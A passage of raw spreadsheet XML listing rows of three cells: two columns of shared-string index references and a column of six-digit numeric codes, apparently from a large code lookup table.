      <c r="C22522" s="15">
        <v>956920</v>
      </c>
    </row>
    <row r="22523" spans="1:3">
      <c r="A22523" s="28" t="s">
        <v>1030</v>
      </c>
      <c r="B22523" s="14" t="s">
        <v>9826</v>
      </c>
      <c r="C22523" s="15">
        <v>956921</v>
      </c>
    </row>
    <row r="22524" spans="1:3">
      <c r="A22524" s="28" t="s">
        <v>178</v>
      </c>
      <c r="B22524" s="14" t="s">
        <v>7386</v>
      </c>
      <c r="C22524" s="15">
        <v>956922</v>
      </c>
    </row>
    <row r="22525" spans="1:3">
      <c r="A22525" s="28" t="s">
        <v>27161</v>
      </c>
      <c r="B22525" s="14" t="s">
        <v>17582</v>
      </c>
      <c r="C22525" s="15">
        <v>957900</v>
      </c>
    </row>
    <row r="22526" spans="1:3">
      <c r="A22526" s="28" t="s">
        <v>27162</v>
      </c>
      <c r="B22526" s="14" t="s">
        <v>17583</v>
      </c>
      <c r="C22526" s="15">
        <v>957908</v>
      </c>
    </row>
    <row r="22527" spans="1:3">
      <c r="A22527" s="28" t="s">
        <v>27163</v>
      </c>
      <c r="B22527" s="14" t="s">
        <v>17584</v>
      </c>
      <c r="C22527" s="15">
        <v>957910</v>
      </c>
    </row>
    <row r="22528" spans="1:3">
      <c r="A22528" s="28" t="s">
        <v>27164</v>
      </c>
      <c r="B22528" s="14" t="s">
        <v>7408</v>
      </c>
      <c r="C22528" s="15">
        <v>957911</v>
      </c>
    </row>
    <row r="22529" spans="1:3">
      <c r="A22529" s="28" t="s">
        <v>27165</v>
      </c>
      <c r="B22529" s="14" t="s">
        <v>17585</v>
      </c>
      <c r="C22529" s="15">
        <v>957912</v>
      </c>
    </row>
    <row r="22530" spans="1:3">
      <c r="A22530" s="28" t="s">
        <v>27166</v>
      </c>
      <c r="B22530" s="14" t="s">
        <v>17586</v>
      </c>
      <c r="C22530" s="15">
        <v>957928</v>
      </c>
    </row>
    <row r="22531" spans="1:3">
      <c r="A22531" s="28" t="s">
        <v>27167</v>
      </c>
      <c r="B22531" s="14" t="s">
        <v>17587</v>
      </c>
      <c r="C22531" s="15">
        <v>957938</v>
      </c>
    </row>
    <row r="22532" spans="1:3">
      <c r="A22532" s="28" t="s">
        <v>27167</v>
      </c>
      <c r="B22532" s="14" t="s">
        <v>17587</v>
      </c>
      <c r="C22532" s="15">
        <v>957995</v>
      </c>
    </row>
    <row r="22533" spans="1:3">
      <c r="A22533" s="28" t="s">
        <v>27168</v>
      </c>
      <c r="B22533" s="14" t="s">
        <v>17588</v>
      </c>
      <c r="C22533" s="15">
        <v>958900</v>
      </c>
    </row>
    <row r="22534" spans="1:3">
      <c r="A22534" s="28" t="s">
        <v>27169</v>
      </c>
      <c r="B22534" s="14" t="s">
        <v>17589</v>
      </c>
      <c r="C22534" s="15">
        <v>958902</v>
      </c>
    </row>
    <row r="22535" spans="1:3">
      <c r="A22535" s="28" t="s">
        <v>27170</v>
      </c>
      <c r="B22535" s="14" t="s">
        <v>17590</v>
      </c>
      <c r="C22535" s="15">
        <v>959900</v>
      </c>
    </row>
    <row r="22536" spans="1:3">
      <c r="A22536" s="28" t="s">
        <v>27171</v>
      </c>
      <c r="B22536" s="14" t="s">
        <v>9573</v>
      </c>
      <c r="C22536" s="15">
        <v>959901</v>
      </c>
    </row>
    <row r="22537" spans="1:3">
      <c r="A22537" s="28" t="s">
        <v>21402</v>
      </c>
      <c r="B22537" s="14" t="s">
        <v>12939</v>
      </c>
      <c r="C22537" s="15">
        <v>959930</v>
      </c>
    </row>
    <row r="22538" spans="1:3">
      <c r="A22538" s="28" t="s">
        <v>27172</v>
      </c>
      <c r="B22538" s="14" t="s">
        <v>12939</v>
      </c>
      <c r="C22538" s="15">
        <v>959939</v>
      </c>
    </row>
    <row r="22539" spans="1:3">
      <c r="A22539" s="28" t="s">
        <v>27173</v>
      </c>
      <c r="B22539" s="14" t="s">
        <v>17591</v>
      </c>
      <c r="C22539" s="15">
        <v>959950</v>
      </c>
    </row>
    <row r="22540" spans="1:3">
      <c r="A22540" s="28" t="s">
        <v>27174</v>
      </c>
      <c r="B22540" s="14" t="s">
        <v>12970</v>
      </c>
      <c r="C22540" s="15">
        <v>960911</v>
      </c>
    </row>
    <row r="22541" spans="1:3">
      <c r="A22541" s="28" t="s">
        <v>27175</v>
      </c>
      <c r="B22541" s="14" t="s">
        <v>17592</v>
      </c>
      <c r="C22541" s="15">
        <v>963900</v>
      </c>
    </row>
    <row r="22542" spans="1:3">
      <c r="A22542" s="28" t="s">
        <v>27176</v>
      </c>
      <c r="B22542" s="14" t="s">
        <v>10680</v>
      </c>
      <c r="C22542" s="15">
        <v>963905</v>
      </c>
    </row>
    <row r="22543" spans="1:3">
      <c r="A22543" s="28" t="s">
        <v>27177</v>
      </c>
      <c r="B22543" s="14" t="s">
        <v>17593</v>
      </c>
      <c r="C22543" s="15">
        <v>968900</v>
      </c>
    </row>
    <row r="22544" spans="1:3">
      <c r="A22544" s="28" t="s">
        <v>27178</v>
      </c>
      <c r="B22544" s="14" t="s">
        <v>17594</v>
      </c>
      <c r="C22544" s="15">
        <v>968903</v>
      </c>
    </row>
    <row r="22545" spans="1:3">
      <c r="A22545" s="28" t="s">
        <v>27179</v>
      </c>
      <c r="B22545" s="14" t="s">
        <v>17595</v>
      </c>
      <c r="C22545" s="15">
        <v>968908</v>
      </c>
    </row>
    <row r="22546" spans="1:3">
      <c r="A22546" s="28" t="s">
        <v>27180</v>
      </c>
      <c r="B22546" s="14" t="s">
        <v>17596</v>
      </c>
      <c r="C22546" s="15">
        <v>968909</v>
      </c>
    </row>
    <row r="22547" spans="1:3">
      <c r="A22547" s="28" t="s">
        <v>27181</v>
      </c>
      <c r="B22547" s="14" t="s">
        <v>17597</v>
      </c>
      <c r="C22547" s="15">
        <v>968910</v>
      </c>
    </row>
    <row r="22548" spans="1:3">
      <c r="A22548" s="28" t="s">
        <v>27182</v>
      </c>
      <c r="B22548" s="14" t="s">
        <v>17598</v>
      </c>
      <c r="C22548" s="15">
        <v>968913</v>
      </c>
    </row>
    <row r="22549" spans="1:3">
      <c r="A22549" s="28" t="s">
        <v>27183</v>
      </c>
      <c r="B22549" s="14" t="s">
        <v>17599</v>
      </c>
      <c r="C22549" s="15">
        <v>969900</v>
      </c>
    </row>
    <row r="22550" spans="1:3">
      <c r="A22550" s="28" t="s">
        <v>27184</v>
      </c>
      <c r="B22550" s="14" t="s">
        <v>17600</v>
      </c>
      <c r="C22550" s="15">
        <v>969901</v>
      </c>
    </row>
    <row r="22551" spans="1:3">
      <c r="A22551" s="28" t="s">
        <v>27185</v>
      </c>
      <c r="B22551" s="14" t="s">
        <v>17601</v>
      </c>
      <c r="C22551" s="15">
        <v>969902</v>
      </c>
    </row>
    <row r="22552" spans="1:3">
      <c r="A22552" s="28" t="s">
        <v>27186</v>
      </c>
      <c r="B22552" s="14" t="s">
        <v>17602</v>
      </c>
      <c r="C22552" s="15">
        <v>969903</v>
      </c>
    </row>
    <row r="22553" spans="1:3">
      <c r="A22553" s="28" t="s">
        <v>27187</v>
      </c>
      <c r="B22553" s="14" t="s">
        <v>17603</v>
      </c>
      <c r="C22553" s="15">
        <v>969904</v>
      </c>
    </row>
    <row r="22554" spans="1:3">
      <c r="A22554" s="28" t="s">
        <v>27188</v>
      </c>
      <c r="B22554" s="14" t="s">
        <v>17604</v>
      </c>
      <c r="C22554" s="15">
        <v>969905</v>
      </c>
    </row>
    <row r="22555" spans="1:3">
      <c r="A22555" s="28" t="s">
        <v>27189</v>
      </c>
      <c r="B22555" s="14" t="s">
        <v>17605</v>
      </c>
      <c r="C22555" s="15">
        <v>969908</v>
      </c>
    </row>
    <row r="22556" spans="1:3">
      <c r="A22556" s="28" t="s">
        <v>27190</v>
      </c>
      <c r="B22556" s="14" t="s">
        <v>8989</v>
      </c>
      <c r="C22556" s="15">
        <v>969916</v>
      </c>
    </row>
    <row r="22557" spans="1:3">
      <c r="A22557" s="28" t="s">
        <v>27191</v>
      </c>
      <c r="B22557" s="14" t="s">
        <v>17606</v>
      </c>
      <c r="C22557" s="15">
        <v>969918</v>
      </c>
    </row>
    <row r="22558" spans="1:3">
      <c r="A22558" s="28" t="s">
        <v>27192</v>
      </c>
      <c r="B22558" s="14" t="s">
        <v>17607</v>
      </c>
      <c r="C22558" s="15">
        <v>969922</v>
      </c>
    </row>
    <row r="22559" spans="1:3">
      <c r="A22559" s="28" t="s">
        <v>27193</v>
      </c>
      <c r="B22559" s="14" t="s">
        <v>17608</v>
      </c>
      <c r="C22559" s="15">
        <v>969924</v>
      </c>
    </row>
    <row r="22560" spans="1:3">
      <c r="A22560" s="28" t="s">
        <v>27194</v>
      </c>
      <c r="B22560" s="14" t="s">
        <v>13153</v>
      </c>
      <c r="C22560" s="15">
        <v>969930</v>
      </c>
    </row>
    <row r="22561" spans="1:3">
      <c r="A22561" s="28" t="s">
        <v>27195</v>
      </c>
      <c r="B22561" s="14" t="s">
        <v>17609</v>
      </c>
      <c r="C22561" s="15">
        <v>971900</v>
      </c>
    </row>
    <row r="22562" spans="1:3">
      <c r="A22562" s="28" t="s">
        <v>27196</v>
      </c>
      <c r="B22562" s="14" t="s">
        <v>17610</v>
      </c>
      <c r="C22562" s="15">
        <v>971920</v>
      </c>
    </row>
    <row r="22563" spans="1:3">
      <c r="A22563" s="28" t="s">
        <v>27197</v>
      </c>
      <c r="B22563" s="14" t="s">
        <v>17611</v>
      </c>
      <c r="C22563" s="15">
        <v>971921</v>
      </c>
    </row>
    <row r="22564" spans="1:3">
      <c r="A22564" s="28" t="s">
        <v>27198</v>
      </c>
      <c r="B22564" s="14" t="s">
        <v>17612</v>
      </c>
      <c r="C22564" s="15">
        <v>971930</v>
      </c>
    </row>
    <row r="22565" spans="1:3">
      <c r="A22565" s="28" t="s">
        <v>27199</v>
      </c>
      <c r="B22565" s="14" t="s">
        <v>17613</v>
      </c>
      <c r="C22565" s="15">
        <v>971931</v>
      </c>
    </row>
    <row r="22566" spans="1:3">
      <c r="A22566" s="28" t="s">
        <v>27200</v>
      </c>
      <c r="B22566" s="14" t="s">
        <v>15121</v>
      </c>
      <c r="C22566" s="15">
        <v>971950</v>
      </c>
    </row>
    <row r="22567" spans="1:3">
      <c r="A22567" s="28" t="s">
        <v>27201</v>
      </c>
      <c r="B22567" s="14" t="s">
        <v>13262</v>
      </c>
      <c r="C22567" s="15">
        <v>972902</v>
      </c>
    </row>
    <row r="22568" spans="1:3">
      <c r="A22568" s="28" t="s">
        <v>27202</v>
      </c>
      <c r="B22568" s="14" t="s">
        <v>17614</v>
      </c>
      <c r="C22568" s="15">
        <v>972903</v>
      </c>
    </row>
    <row r="22569" spans="1:3">
      <c r="A22569" s="28" t="s">
        <v>27203</v>
      </c>
      <c r="B22569" s="14" t="s">
        <v>17615</v>
      </c>
      <c r="C22569" s="15">
        <v>972904</v>
      </c>
    </row>
    <row r="22570" spans="1:3">
      <c r="A22570" s="28" t="s">
        <v>21087</v>
      </c>
      <c r="B22570" s="14" t="s">
        <v>10188</v>
      </c>
      <c r="C22570" s="15">
        <v>972905</v>
      </c>
    </row>
    <row r="22571" spans="1:3">
      <c r="A22571" s="28" t="s">
        <v>27204</v>
      </c>
      <c r="B22571" s="14" t="s">
        <v>13212</v>
      </c>
      <c r="C22571" s="15">
        <v>972906</v>
      </c>
    </row>
    <row r="22572" spans="1:3">
      <c r="A22572" s="28" t="s">
        <v>27204</v>
      </c>
      <c r="B22572" s="14" t="s">
        <v>13212</v>
      </c>
      <c r="C22572" s="15">
        <v>972916</v>
      </c>
    </row>
    <row r="22573" spans="1:3">
      <c r="A22573" s="28" t="s">
        <v>27205</v>
      </c>
      <c r="B22573" s="14" t="s">
        <v>17616</v>
      </c>
      <c r="C22573" s="15">
        <v>972918</v>
      </c>
    </row>
    <row r="22574" spans="1:3">
      <c r="A22574" s="28" t="s">
        <v>21711</v>
      </c>
      <c r="B22574" s="14" t="s">
        <v>10836</v>
      </c>
      <c r="C22574" s="15">
        <v>972920</v>
      </c>
    </row>
    <row r="22575" spans="1:3">
      <c r="A22575" s="28" t="s">
        <v>27206</v>
      </c>
      <c r="B22575" s="14" t="s">
        <v>17617</v>
      </c>
      <c r="C22575" s="15">
        <v>972921</v>
      </c>
    </row>
    <row r="22576" spans="1:3">
      <c r="A22576" s="28" t="s">
        <v>21087</v>
      </c>
      <c r="B22576" s="14" t="s">
        <v>10188</v>
      </c>
      <c r="C22576" s="15">
        <v>972922</v>
      </c>
    </row>
    <row r="22577" spans="1:3">
      <c r="A22577" s="28" t="s">
        <v>21087</v>
      </c>
      <c r="B22577" s="14" t="s">
        <v>10188</v>
      </c>
      <c r="C22577" s="15">
        <v>972923</v>
      </c>
    </row>
    <row r="22578" spans="1:3">
      <c r="A22578" s="28" t="s">
        <v>27207</v>
      </c>
      <c r="B22578" s="14" t="s">
        <v>17618</v>
      </c>
      <c r="C22578" s="15">
        <v>972924</v>
      </c>
    </row>
    <row r="22579" spans="1:3">
      <c r="A22579" s="28" t="s">
        <v>27208</v>
      </c>
      <c r="B22579" s="14" t="s">
        <v>17619</v>
      </c>
      <c r="C22579" s="15">
        <v>972925</v>
      </c>
    </row>
    <row r="22580" spans="1:3">
      <c r="A22580" s="28" t="s">
        <v>24014</v>
      </c>
      <c r="B22580" s="14" t="s">
        <v>13384</v>
      </c>
      <c r="C22580" s="15">
        <v>972927</v>
      </c>
    </row>
    <row r="22581" spans="1:3">
      <c r="A22581" s="28" t="s">
        <v>27209</v>
      </c>
      <c r="B22581" s="14" t="s">
        <v>13188</v>
      </c>
      <c r="C22581" s="15">
        <v>972930</v>
      </c>
    </row>
    <row r="22582" spans="1:3">
      <c r="A22582" s="28" t="s">
        <v>27210</v>
      </c>
      <c r="B22582" s="14" t="s">
        <v>10188</v>
      </c>
      <c r="C22582" s="15">
        <v>972931</v>
      </c>
    </row>
    <row r="22583" spans="1:3">
      <c r="A22583" s="28" t="s">
        <v>27211</v>
      </c>
      <c r="B22583" s="14" t="s">
        <v>17620</v>
      </c>
      <c r="C22583" s="15">
        <v>972933</v>
      </c>
    </row>
    <row r="22584" spans="1:3">
      <c r="A22584" s="28" t="s">
        <v>27212</v>
      </c>
      <c r="B22584" s="14" t="s">
        <v>10464</v>
      </c>
      <c r="C22584" s="15">
        <v>973901</v>
      </c>
    </row>
    <row r="22585" spans="1:3">
      <c r="A22585" s="28" t="s">
        <v>27213</v>
      </c>
      <c r="B22585" s="14" t="s">
        <v>13557</v>
      </c>
      <c r="C22585" s="15">
        <v>973902</v>
      </c>
    </row>
    <row r="22586" spans="1:3">
      <c r="A22586" s="28" t="s">
        <v>27214</v>
      </c>
      <c r="B22586" s="14" t="s">
        <v>17621</v>
      </c>
      <c r="C22586" s="15">
        <v>973903</v>
      </c>
    </row>
    <row r="22587" spans="1:3">
      <c r="A22587" s="28" t="s">
        <v>27215</v>
      </c>
      <c r="B22587" s="14" t="s">
        <v>17622</v>
      </c>
      <c r="C22587" s="15">
        <v>973904</v>
      </c>
    </row>
    <row r="22588" spans="1:3">
      <c r="A22588" s="28" t="s">
        <v>27216</v>
      </c>
      <c r="B22588" s="14" t="s">
        <v>17623</v>
      </c>
      <c r="C22588" s="15">
        <v>973914</v>
      </c>
    </row>
    <row r="22589" spans="1:3">
      <c r="A22589" s="28" t="s">
        <v>24033</v>
      </c>
      <c r="B22589" s="14" t="s">
        <v>17624</v>
      </c>
      <c r="C22589" s="15">
        <v>973916</v>
      </c>
    </row>
    <row r="22590" spans="1:3">
      <c r="A22590" s="28" t="s">
        <v>1030</v>
      </c>
      <c r="B22590" s="14" t="s">
        <v>9826</v>
      </c>
      <c r="C22590" s="15">
        <v>973917</v>
      </c>
    </row>
    <row r="22591" spans="1:3">
      <c r="A22591" s="28" t="s">
        <v>27217</v>
      </c>
      <c r="B22591" s="14" t="s">
        <v>17625</v>
      </c>
      <c r="C22591" s="15">
        <v>973920</v>
      </c>
    </row>
    <row r="22592" spans="1:3">
      <c r="A22592" s="28" t="s">
        <v>27218</v>
      </c>
      <c r="B22592" s="14" t="s">
        <v>17626</v>
      </c>
      <c r="C22592" s="15">
        <v>973921</v>
      </c>
    </row>
    <row r="22593" spans="1:3">
      <c r="A22593" s="28" t="s">
        <v>27219</v>
      </c>
      <c r="B22593" s="14" t="s">
        <v>17627</v>
      </c>
      <c r="C22593" s="15">
        <v>973923</v>
      </c>
    </row>
    <row r="22594" spans="1:3">
      <c r="A22594" s="28" t="s">
        <v>27220</v>
      </c>
      <c r="B22594" s="14" t="s">
        <v>15174</v>
      </c>
      <c r="C22594" s="15">
        <v>973924</v>
      </c>
    </row>
    <row r="22595" spans="1:3">
      <c r="A22595" s="28" t="s">
        <v>27221</v>
      </c>
      <c r="B22595" s="14" t="s">
        <v>17628</v>
      </c>
      <c r="C22595" s="15">
        <v>973928</v>
      </c>
    </row>
    <row r="22596" spans="1:3">
      <c r="A22596" s="28" t="s">
        <v>27222</v>
      </c>
      <c r="B22596" s="14" t="s">
        <v>15174</v>
      </c>
      <c r="C22596" s="15">
        <v>973932</v>
      </c>
    </row>
    <row r="22597" spans="1:3">
      <c r="A22597" s="28" t="s">
        <v>21896</v>
      </c>
      <c r="B22597" s="14" t="s">
        <v>10400</v>
      </c>
      <c r="C22597" s="15">
        <v>973934</v>
      </c>
    </row>
    <row r="22598" spans="1:3">
      <c r="A22598" s="28" t="s">
        <v>27223</v>
      </c>
      <c r="B22598" s="14" t="s">
        <v>11762</v>
      </c>
      <c r="C22598" s="15">
        <v>973935</v>
      </c>
    </row>
    <row r="22599" spans="1:3">
      <c r="A22599" s="28" t="s">
        <v>27224</v>
      </c>
      <c r="B22599" s="14" t="s">
        <v>17629</v>
      </c>
      <c r="C22599" s="15">
        <v>973939</v>
      </c>
    </row>
    <row r="22600" spans="1:3">
      <c r="A22600" s="28" t="s">
        <v>27225</v>
      </c>
      <c r="B22600" s="14" t="s">
        <v>17630</v>
      </c>
      <c r="C22600" s="15">
        <v>973943</v>
      </c>
    </row>
    <row r="22601" spans="1:3">
      <c r="A22601" s="28" t="s">
        <v>27226</v>
      </c>
      <c r="B22601" s="14" t="s">
        <v>17631</v>
      </c>
      <c r="C22601" s="15">
        <v>974916</v>
      </c>
    </row>
    <row r="22602" spans="1:3">
      <c r="A22602" s="28" t="s">
        <v>557</v>
      </c>
      <c r="B22602" s="14" t="s">
        <v>11022</v>
      </c>
      <c r="C22602" s="15">
        <v>974917</v>
      </c>
    </row>
    <row r="22603" spans="1:3">
      <c r="A22603" s="28" t="s">
        <v>27227</v>
      </c>
      <c r="B22603" s="14" t="s">
        <v>17632</v>
      </c>
      <c r="C22603" s="15">
        <v>974924</v>
      </c>
    </row>
    <row r="22604" spans="1:3">
      <c r="A22604" s="28" t="s">
        <v>27228</v>
      </c>
      <c r="B22604" s="14" t="s">
        <v>10464</v>
      </c>
      <c r="C22604" s="15">
        <v>975901</v>
      </c>
    </row>
    <row r="22605" spans="1:3">
      <c r="A22605" s="28" t="s">
        <v>27229</v>
      </c>
      <c r="B22605" s="14" t="s">
        <v>17633</v>
      </c>
      <c r="C22605" s="15">
        <v>975912</v>
      </c>
    </row>
    <row r="22606" spans="1:3">
      <c r="A22606" s="28" t="s">
        <v>24152</v>
      </c>
      <c r="B22606" s="14" t="s">
        <v>13527</v>
      </c>
      <c r="C22606" s="15">
        <v>975913</v>
      </c>
    </row>
    <row r="22607" spans="1:3">
      <c r="A22607" s="28" t="s">
        <v>27230</v>
      </c>
      <c r="B22607" s="14" t="s">
        <v>17634</v>
      </c>
      <c r="C22607" s="15">
        <v>975914</v>
      </c>
    </row>
    <row r="22608" spans="1:3">
      <c r="A22608" s="28" t="s">
        <v>27231</v>
      </c>
      <c r="B22608" s="14" t="s">
        <v>17635</v>
      </c>
      <c r="C22608" s="15">
        <v>975915</v>
      </c>
    </row>
    <row r="22609" spans="1:3">
      <c r="A22609" s="28" t="s">
        <v>27232</v>
      </c>
      <c r="B22609" s="14" t="s">
        <v>17636</v>
      </c>
      <c r="C22609" s="15">
        <v>975916</v>
      </c>
    </row>
    <row r="22610" spans="1:3">
      <c r="A22610" s="28" t="s">
        <v>27233</v>
      </c>
      <c r="B22610" s="14" t="s">
        <v>17637</v>
      </c>
      <c r="C22610" s="15">
        <v>975920</v>
      </c>
    </row>
    <row r="22611" spans="1:3">
      <c r="A22611" s="28" t="s">
        <v>27234</v>
      </c>
      <c r="B22611" s="14" t="s">
        <v>17638</v>
      </c>
      <c r="C22611" s="15">
        <v>975930</v>
      </c>
    </row>
    <row r="22612" spans="1:3">
      <c r="A22612" s="28" t="s">
        <v>27235</v>
      </c>
      <c r="B22612" s="14" t="s">
        <v>15246</v>
      </c>
      <c r="C22612" s="15">
        <v>975931</v>
      </c>
    </row>
    <row r="22613" spans="1:3">
      <c r="A22613" s="28" t="s">
        <v>27236</v>
      </c>
      <c r="B22613" s="14" t="s">
        <v>17639</v>
      </c>
      <c r="C22613" s="15">
        <v>978901</v>
      </c>
    </row>
    <row r="22614" spans="1:3">
      <c r="A22614" s="28" t="s">
        <v>27237</v>
      </c>
      <c r="B22614" s="14" t="s">
        <v>17640</v>
      </c>
      <c r="C22614" s="15">
        <v>978903</v>
      </c>
    </row>
    <row r="22615" spans="1:3">
      <c r="A22615" s="28" t="s">
        <v>27238</v>
      </c>
      <c r="B22615" s="14" t="s">
        <v>17641</v>
      </c>
      <c r="C22615" s="15">
        <v>978904</v>
      </c>
    </row>
    <row r="22616" spans="1:3">
      <c r="A22616" s="28" t="s">
        <v>27239</v>
      </c>
      <c r="B22616" s="14" t="s">
        <v>17642</v>
      </c>
      <c r="C22616" s="15">
        <v>978905</v>
      </c>
    </row>
    <row r="22617" spans="1:3">
      <c r="A22617" s="28" t="s">
        <v>27240</v>
      </c>
      <c r="B22617" s="14" t="s">
        <v>17643</v>
      </c>
      <c r="C22617" s="15">
        <v>978906</v>
      </c>
    </row>
    <row r="22618" spans="1:3">
      <c r="A22618" s="28" t="s">
        <v>27241</v>
      </c>
      <c r="B22618" s="14" t="s">
        <v>17644</v>
      </c>
      <c r="C22618" s="15">
        <v>978907</v>
      </c>
    </row>
    <row r="22619" spans="1:3">
      <c r="A22619" s="28" t="s">
        <v>27242</v>
      </c>
      <c r="B22619" s="14" t="s">
        <v>17645</v>
      </c>
      <c r="C22619" s="15">
        <v>978908</v>
      </c>
    </row>
    <row r="22620" spans="1:3">
      <c r="A22620" s="28" t="s">
        <v>27243</v>
      </c>
      <c r="B22620" s="14" t="s">
        <v>17646</v>
      </c>
      <c r="C22620" s="15">
        <v>978909</v>
      </c>
    </row>
    <row r="22621" spans="1:3">
      <c r="A22621" s="28" t="s">
        <v>27244</v>
      </c>
      <c r="B22621" s="14" t="s">
        <v>17647</v>
      </c>
      <c r="C22621" s="15">
        <v>978911</v>
      </c>
    </row>
    <row r="22622" spans="1:3">
      <c r="A22622" s="28" t="s">
        <v>27245</v>
      </c>
      <c r="B22622" s="14" t="s">
        <v>17648</v>
      </c>
      <c r="C22622" s="15">
        <v>978912</v>
      </c>
    </row>
    <row r="22623" spans="1:3">
      <c r="A22623" s="28" t="s">
        <v>27246</v>
      </c>
      <c r="B22623" s="14" t="s">
        <v>17649</v>
      </c>
      <c r="C22623" s="15">
        <v>978913</v>
      </c>
    </row>
    <row r="22624" spans="1:3">
      <c r="A22624" s="28" t="s">
        <v>27247</v>
      </c>
      <c r="B22624" s="14" t="s">
        <v>17650</v>
      </c>
      <c r="C22624" s="15">
        <v>978925</v>
      </c>
    </row>
    <row r="22625" spans="1:3">
      <c r="A22625" s="28" t="s">
        <v>27248</v>
      </c>
      <c r="B22625" s="14" t="s">
        <v>17651</v>
      </c>
      <c r="C22625" s="15">
        <v>992901</v>
      </c>
    </row>
    <row r="22626" spans="1:3">
      <c r="A22626" s="28" t="s">
        <v>27249</v>
      </c>
      <c r="B22626" s="14" t="s">
        <v>17652</v>
      </c>
      <c r="C22626" s="15">
        <v>992902</v>
      </c>
    </row>
    <row r="22627" spans="1:3">
      <c r="A22627" s="28" t="s">
        <v>27250</v>
      </c>
      <c r="B22627" s="14" t="s">
        <v>17653</v>
      </c>
      <c r="C22627" s="15">
        <v>992903</v>
      </c>
    </row>
    <row r="22628" spans="1:3">
      <c r="A22628" s="28" t="s">
        <v>27251</v>
      </c>
      <c r="B22628" s="14" t="s">
        <v>17654</v>
      </c>
      <c r="C22628" s="15">
        <v>992905</v>
      </c>
    </row>
    <row r="22629" spans="1:3">
      <c r="A22629" s="28" t="s">
        <v>27252</v>
      </c>
      <c r="B22629" s="14" t="s">
        <v>12844</v>
      </c>
      <c r="C22629" s="15">
        <v>992930</v>
      </c>
    </row>
    <row r="22630" spans="1:3">
      <c r="A22630" s="28" t="s">
        <v>27253</v>
      </c>
      <c r="B22630" s="14" t="s">
        <v>17655</v>
      </c>
      <c r="C22630" s="15">
        <v>998900</v>
      </c>
    </row>
    <row r="22631" spans="1:3">
      <c r="A22631" s="28" t="s">
        <v>27254</v>
      </c>
      <c r="B22631" s="14" t="s">
        <v>17656</v>
      </c>
      <c r="C22631" s="15">
        <v>999900</v>
      </c>
    </row>
    <row r="22632" spans="1:3">
      <c r="A22632" s="28" t="s">
        <v>27255</v>
      </c>
      <c r="B22632" s="14" t="s">
        <v>17657</v>
      </c>
      <c r="C22632" s="15">
        <v>999910</v>
      </c>
    </row>
    <row r="22633" spans="1:3">
      <c r="A22633" s="28" t="s">
        <v>27256</v>
      </c>
      <c r="B22633" s="14" t="s">
        <v>17658</v>
      </c>
      <c r="C22633" s="15">
        <v>999911</v>
      </c>
    </row>
    <row r="22634" spans="1:3">
      <c r="A22634" s="28" t="s">
        <v>27257</v>
      </c>
      <c r="B22634" s="14" t="s">
        <v>17659</v>
      </c>
      <c r="C22634" s="15">
        <v>999912</v>
      </c>
    </row>
    <row r="22635" spans="1:3">
      <c r="A22635" s="28" t="s">
        <v>27258</v>
      </c>
      <c r="B22635" s="14" t="s">
        <v>17660</v>
      </c>
      <c r="C22635" s="15" t="s">
        <v>17661</v>
      </c>
    </row>
    <row r="22636" spans="1:3">
      <c r="A22636" s="28" t="s">
        <v>27259</v>
      </c>
      <c r="B22636" s="14" t="s">
        <v>17662</v>
      </c>
      <c r="C22636" s="15" t="s">
        <v>17663</v>
      </c>
    </row>
    <row r="22637" spans="1:3">
      <c r="A22637" s="28" t="s">
        <v>27260</v>
      </c>
      <c r="B22637" s="14" t="s">
        <v>17664</v>
      </c>
      <c r="C22637" s="15" t="s">
        <v>17665</v>
      </c>
    </row>
    <row r="22638" spans="1:3">
      <c r="A22638" s="28" t="s">
        <v>27261</v>
      </c>
      <c r="B22638" s="14" t="s">
        <v>17666</v>
      </c>
      <c r="C22638" s="15" t="s">
        <v>17667</v>
      </c>
    </row>
    <row r="22639" spans="1:3">
      <c r="A22639" s="28" t="s">
        <v>27262</v>
      </c>
      <c r="B22639" s="14" t="s">
        <v>17668</v>
      </c>
      <c r="C22639" s="15" t="s">
        <v>17669</v>
      </c>
    </row>
    <row r="22640" spans="1:3">
      <c r="A22640" s="28" t="s">
        <v>27263</v>
      </c>
      <c r="B22640" s="14" t="s">
        <v>11824</v>
      </c>
      <c r="C22640" s="15" t="s">
        <v>17670</v>
      </c>
    </row>
    <row r="22641" spans="1:3">
      <c r="A22641" s="28" t="s">
        <v>27264</v>
      </c>
      <c r="B22641" s="14" t="s">
        <v>17671</v>
      </c>
      <c r="C22641" s="15" t="s">
        <v>17672</v>
      </c>
    </row>
    <row r="22642" spans="1:3">
      <c r="A22642" s="28" t="s">
        <v>27265</v>
      </c>
      <c r="B22642" s="14" t="s">
        <v>17673</v>
      </c>
      <c r="C22642" s="15" t="s">
        <v>17674</v>
      </c>
    </row>
    <row r="22643" spans="1:3">
      <c r="A22643" s="28" t="s">
        <v>27266</v>
      </c>
      <c r="B22643" s="14" t="s">
        <v>17675</v>
      </c>
      <c r="C22643" s="15" t="s">
        <v>17676</v>
      </c>
    </row>
    <row r="22644" spans="1:3">
      <c r="A22644" s="28" t="s">
        <v>27267</v>
      </c>
      <c r="B22644" s="14" t="s">
        <v>17677</v>
      </c>
      <c r="C22644" s="15" t="s">
        <v>17678</v>
      </c>
    </row>
    <row r="22645" spans="1:3">
      <c r="A22645" s="28" t="s">
        <v>27268</v>
      </c>
      <c r="B22645" s="14" t="s">
        <v>17679</v>
      </c>
      <c r="C22645" s="15" t="s">
        <v>17680</v>
      </c>
    </row>
    <row r="22646" spans="1:3">
      <c r="A22646" s="28" t="s">
        <v>27269</v>
      </c>
      <c r="B22646" s="14" t="s">
        <v>17681</v>
      </c>
      <c r="C22646" s="15" t="s">
        <v>17682</v>
      </c>
    </row>
    <row r="22647" spans="1:3">
      <c r="A22647" s="28" t="s">
        <v>27270</v>
      </c>
      <c r="B22647" s="14" t="s">
        <v>17683</v>
      </c>
      <c r="C22647" s="15" t="s">
        <v>17684</v>
      </c>
    </row>
    <row r="22648" spans="1:3">
      <c r="A22648" s="28" t="s">
        <v>27271</v>
      </c>
      <c r="B22648" s="14" t="s">
        <v>17685</v>
      </c>
      <c r="C22648" s="15" t="s">
        <v>17686</v>
      </c>
    </row>
    <row r="22649" spans="1:3">
      <c r="A22649" s="28" t="s">
        <v>27272</v>
      </c>
      <c r="B22649" s="14" t="s">
        <v>17687</v>
      </c>
      <c r="C22649" s="15" t="s">
        <v>17688</v>
      </c>
    </row>
    <row r="22650" spans="1:3">
      <c r="A22650" s="28" t="s">
        <v>27273</v>
      </c>
      <c r="B22650" s="14" t="s">
        <v>17689</v>
      </c>
      <c r="C22650" s="15" t="s">
        <v>17690</v>
      </c>
    </row>
    <row r="22651" spans="1:3">
      <c r="A22651" s="28" t="s">
        <v>27274</v>
      </c>
